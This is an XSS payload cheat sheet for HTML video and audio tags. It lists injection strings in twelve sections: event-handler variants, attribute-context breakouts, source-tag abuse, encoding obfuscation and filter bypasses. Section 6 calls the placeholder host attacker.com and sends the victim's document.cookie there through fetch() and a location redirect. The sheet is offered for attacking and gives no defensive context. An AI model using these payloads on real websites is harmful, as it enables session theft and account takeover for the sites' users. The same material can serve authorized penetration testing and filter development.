🔥 ULTIMATE AUDIO / VIDEO XSS (CLEAN)

⸻

1. CORE (ENG MUHIM)

<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>


⸻

2. VARIATIONS

<video src=1 onerror=alert(1)>
<audio src=invalid onerror=alert(1)>


⸻

3. CONTEXT BREAKOUT

"><video src=x onerror=alert(1)>
'><audio src=x onerror=alert(1)>


⸻

4. EVENT VARIATIONS (MUHIM)

<video src=x onerror=alert(1)>
<video src=x onloadeddata=alert(1)>
<audio src=x onloadeddata=alert(1)>
<video src=x oncanplay=alert(1)>


⸻

5. SOURCE TAG ABUSE

<video><source src=x onerror=alert(1)></video>
<audio><source src=x onerror=alert(1)></audio>


⸻

6. DATA EXTRACTION

<video src=x onerror=fetch('//attacker.com?c='+document.cookie)>
<audio src=x onerror=location='//attacker.com?c='+document.cookie>


⸻

7. OBFUSCATION

<video src=x onerror=\u0061lert(1)>
<audio src=x onerror=alert(String.fromCharCode(88,83,83))>


⸻

8. ATTRIBUTE BYPASS

<video/src=x onerror=alert(1)>
<audio/src=x/onerror=alert(1)>


⸻

9. POLYGLOT

</title><video src=x onerror=alert(1)>


⸻

10. MODERN JS

<video src=x onerror=alert`1`>
<audio src=x onerror=(()=>alert(1))()>


⸻

11. ADVANCED EXECUTION

<video src=x onerror=eval('alert(1)')>
<audio src=x onerror=setTimeout(alert,0,1)>


⸻

12. RARE BUT USEFUL

<video src=x onerror=throw alert(1)>
<audio src=x onerror=onerror=alert;throw 1>
